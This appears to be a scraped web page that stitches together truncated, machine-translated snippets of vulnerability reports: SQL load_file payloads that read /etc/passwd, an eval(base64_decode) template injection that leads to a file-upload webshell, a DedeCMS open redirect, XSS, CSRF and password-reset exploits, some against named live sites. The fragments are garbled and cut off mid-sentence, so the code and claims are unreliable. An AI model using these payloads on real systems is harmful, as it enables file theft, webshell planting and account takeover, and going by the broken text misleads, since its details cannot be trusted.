User-submitted data
The major weakness of many PHP programs is not the problem of the PHP language, but caused by the low security awareness of programmers. Therefore, you must always pay attention to the possible problems in each piece of code to
Brief description:
It is a remote attacker that may inject custom HTTP headers.
Attackers can inject session cookies or HTML code.
This vulnerability may cause XSS (Cross-Site Scripting) or session fixation.
Detailed description:
Set
1. replace (load_file (0 × 2F6574632F706173737764), 0 × 3c, 0 × 20)
2. replace (load_file (char (47,101,116, 115,115,119,100,), char (60), char (32 ))
The above two items show the full code in a PHP file. Sometimes some characters are not replaced.
Brief description: The Search output content is not escaped, resulting in the Construction of malformed file names inserted into JS Code
Description: 1. Access address:
Http://try5.mynet.cn/trial/login.aspxgeneration website
2. on the homepage,
Register an id first
Submit a ticket as follows:
{Php} eval (base64_decode ('commandid too many commandid = '); {/php}
After base64 decryption:
$ Code =
Echo ' ';
Echo ' ';
If ($ _ POST ['_ upl'] = "Upload "){
If (@ copy ($ _ FILES
Brief description: dedecms jump to any addressHttp://www.dedecms.com/plus/download.php? Open = 1 & link = aHR0cDovL3d3dy5iYWlkdS5jb20 % 3D
$ Link = base64_decode (urldecode ($ link); www.2cto.comLink can be constructed into any address.
Header
Title:
======
AppRain CMF v0.1.5-Multiple Web Vulnerabilities
Overview:
==================
AppRain is one of the first officially released Opensource Content Management Framework (CMF ).
CMF is a new web engineering concept where CMS (Content
Brief description: filtering is not strict. Although XSS is not directly caused, re-constructing the js region may cause XSS!
For more information, see test on Jiaxing station! Other sub-stations did not look at it. When posting in the 'talking
XSS, also known as CSS (Cross Site Script), is a Cross-Site scripting attack. A malicious attacker inserts malicious html code into a Web page. When a user browses this page, the html code embedded in the Web page is executed, to achieve the Special
Wordpress3.5.1 modifying the topic template in the background to prevent CSRF from being lax. You can add a hyperlink to the front-end comments to write tempting things to defraud the Administrator to write a trojan sentence after clicking it.Go to
I. CSRFExample: a website that is under attack in the login status sends a request to the Security site. Solution: Use @ Html. AntiForgeryToken () in the view and add the [ValidateAntiForgeryToken] feature to the Action. When The request is sent
View user business cards
Url: http://weixin.qq.com/cgi-bin/showcard? T = weixin_card & muin = your QQ number & fuin = Your/your friend's QQ number # a logon prompt will be prompted when accessing the QQ client of a higher version. You can directly
Exp:
URL: Email:
Replace localhost with the domain name and email address of the target site. Enter your email address and click Submit. The teenager will go to the email address you just filled in and click the link to set the account
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.